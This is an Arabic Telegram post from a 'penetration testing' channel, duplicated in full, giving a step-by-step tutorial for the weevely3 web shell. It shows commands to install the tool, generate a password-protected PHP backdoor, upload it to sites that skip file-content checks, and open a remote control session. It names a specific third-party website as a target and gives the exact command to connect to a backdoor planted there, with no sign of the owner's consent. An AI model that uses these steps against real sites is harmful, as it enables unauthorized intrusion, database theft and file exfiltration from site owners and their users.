ERROR 404 BULLET MHS

🎲 - اداة weevely :

⭕️ - اداة مخصصة لاختبار اختراق المواقع فهي تقوم برفع Shell على الموقع والتحكم به وكما انها سهلة الاستخدام سنقوم بشرحها عملياً على احد المواقع من انشاء ملف Shell حتى التحكم بالموقع

[+] - كما ان الاداة تسمح لنا بجلب قواعد بيانات Sql ورفع ملفات او سحب ملفات وغيرها.

[-] - اولاً يمكنكم تحميل الاداة بهذه الطريقه فقط قم بكتابة ما بعد [ # ]

bullet@mhs:~# git clone https://github.com/epinna/weevely3

🖱 - بعد ان قمنا بتحميلها نقوم بالدخول إلى ملف الاداة
bullet@mhs:~# cd weevely3/

🗜 - سنرى العديد من الملفات ما يهمنا هو ملفين فقط وهم
1- requirements.txt
2- weevely.py

ويمكنك قراءه ال Reademe ايضا لا احد سيقوم بمنعك يا عزيزي

📡 - الملف الاول فيه اسماء المكاتب التي قد تكون غير مثبته على النظام الذي تستخدمه ولكي لا تواجهك اي مشاكل فقط قم بكتابة

bullet@mhs:~# pip install -r requirements.txt

💡- الان حان وقت انشاء الملف الخبيث او الجيد من نضرك !

نقوم بكتابة :

bullet@mhs:~# python weevely.py generate bullet#123|mhs $HOME/mhs.php

مالذي مكتوب في الاعلى ?

اولا قمنا بتشغيل الاداه عبر python وبعدها ملف الاداة ثم قمت باستخدام الخيار
generate
وهو احد الخيارات في الاداة للانشاء ثم بعدها قمت بعمل كلمة سر الا وهي

bullet#123|mhs
ما فائده كلمة السر ?
وكيف استخدمها ?
لا تستعجل ساخبرك حينما نصل يا عزيزي !

ثم بعدها قمت باختيار المسار الذي سينحفظ فيه الملف وهو
$HOME/mhs.php

الان نقوم برفع الملف على بعض المواقع التي لا تقوم بالتحقق من محتوى الملفات

يمكنك التجربه على هذا الموقع والذي سارفق صور بالاسفل توضح بعض المفاهيم في الشرح :

www.codesoft.sd

الان وبعد ان قمنا بتجهيز الملف ورفعه نقوم بجلب مسار الملف بعد ان تم رفعه وهناك العديد من الطرق اولا اما الموقع بنفسه سيقوم باظهار المسار او قم بالدخول إلى ملف Uploads الذي قد يعتبره المطور لا ضرر باضهاره وانت قم بالبحث عن اسم ملفك بينهم
وبعد ان تقوم بجلب المسار مع اسم الموقع نقوم بفتح التيرمنال وكتابة :

ِbullet@mhs:~# python weevely.py www.codesoft.sd/mhs.php bullet#123|mhs

بعد ان قمنا بتشغيل الاداه قمنا بنفس السطر بعمل المسار الذي يتواجد فيه الملف الخاص بنا ثم مسافة ثم كلمة السر الخاصه بنا فتخيل اذا كان بدون كلمة سر هل من الجيد ان ياتي شخص اخر ويقوم بسرقة مجهودك ?

بعدها سيقوم بفتح جلسة مع الموقع مع اظهار
weevely>

يمكنك كتابة help لاستعراض الاوامر

🎲 - إذا كنت ترى خطا مني او بشيء ناقص قم بكتابته في التعليقات

🔓 - للمزيد انضم على قناتنا :

⚙ - https://www.tgoop.com/Penetration_TestingAr

GitHub

GitHub - epinna/weevely3: Weaponized web shell

Weaponized web shell. Contribute to epinna/weevely3 development by creating an account on GitHub.

www.tgoop.com/Penetration_TestingAr/2882

2.6K viewsedited  May 29, 2021 at 13:22

🎲 - اداة weevely :

⭕️ - اداة مخصصة لاختبار اختراق المواقع فهي تقوم برفع Shell على الموقع والتحكم به وكما انها سهلة الاستخدام سنقوم بشرحها عملياً على احد المواقع من انشاء ملف Shell حتى التحكم بالموقع

[+] - كما ان الاداة تسمح لنا بجلب قواعد بيانات Sql ورفع ملفات او سحب ملفات وغيرها.

[-] - اولاً يمكنكم تحميل الاداة بهذه الطريقه فقط قم بكتابة ما بعد [ # ]

bullet@mhs:~# git clone https://github.com/epinna/weevely3

🖱 - بعد ان قمنا بتحميلها نقوم بالدخول إلى ملف الاداة
bullet@mhs:~# cd weevely3/

🗜 - سنرى العديد من الملفات ما يهمنا هو ملفين فقط وهم
1- requirements.txt
2- weevely.py

ويمكنك قراءه ال Reademe ايضا لا احد سيقوم بمنعك يا عزيزي

📡 - الملف الاول فيه اسماء المكاتب التي قد تكون غير مثبته على النظام الذي تستخدمه ولكي لا تواجهك اي مشاكل فقط قم بكتابة

bullet@mhs:~# pip install -r requirements.txt

💡- الان حان وقت انشاء الملف الخبيث او الجيد من نضرك !

نقوم بكتابة :

bullet@mhs:~# python weevely.py generate bullet#123|mhs $HOME/mhs.php

مالذي مكتوب في الاعلى ?

اولا قمنا بتشغيل الاداه عبر python وبعدها ملف الاداة ثم قمت باستخدام الخيار
generate
وهو احد الخيارات في الاداة للانشاء ثم بعدها قمت بعمل كلمة سر الا وهي

bullet#123|mhs
ما فائده كلمة السر ?
وكيف استخدمها ?
لا تستعجل ساخبرك حينما نصل يا عزيزي !

ثم بعدها قمت باختيار المسار الذي سينحفظ فيه الملف وهو
$HOME/mhs.php

الان نقوم برفع الملف على بعض المواقع التي لا تقوم بالتحقق من محتوى الملفات

يمكنك التجربه على هذا الموقع والذي سارفق صور بالاسفل توضح بعض المفاهيم في الشرح :

www.codesoft.sd

الان وبعد ان قمنا بتجهيز الملف ورفعه نقوم بجلب مسار الملف بعد ان تم رفعه وهناك العديد من الطرق اولا اما الموقع بنفسه سيقوم باظهار المسار او قم بالدخول إلى ملف Uploads الذي قد يعتبره المطور لا ضرر باضهاره وانت قم بالبحث عن اسم ملفك بينهم
وبعد ان تقوم بجلب المسار مع اسم الموقع نقوم بفتح التيرمنال وكتابة :

ِbullet@mhs:~# python weevely.py www.codesoft.sd/mhs.php bullet#123|mhs

بعد ان قمنا بتشغيل الاداه قمنا بنفس السطر بعمل المسار الذي يتواجد فيه الملف الخاص بنا ثم مسافة ثم كلمة السر الخاصه بنا فتخيل اذا كان بدون كلمة سر هل من الجيد ان ياتي شخص اخر ويقوم بسرقة مجهودك ?

بعدها سيقوم بفتح جلسة مع الموقع مع اظهار
weevely>

يمكنك كتابة help لاستعراض الاوامر

🎲 - إذا كنت ترى خطا مني او بشيء ناقص قم بكتابته في التعليقات

🔓 - للمزيد انضم على قناتنا :

⚙ - https://www.tgoop.com/Penetration_TestingAr

BY ERROR 404 BULLET MHS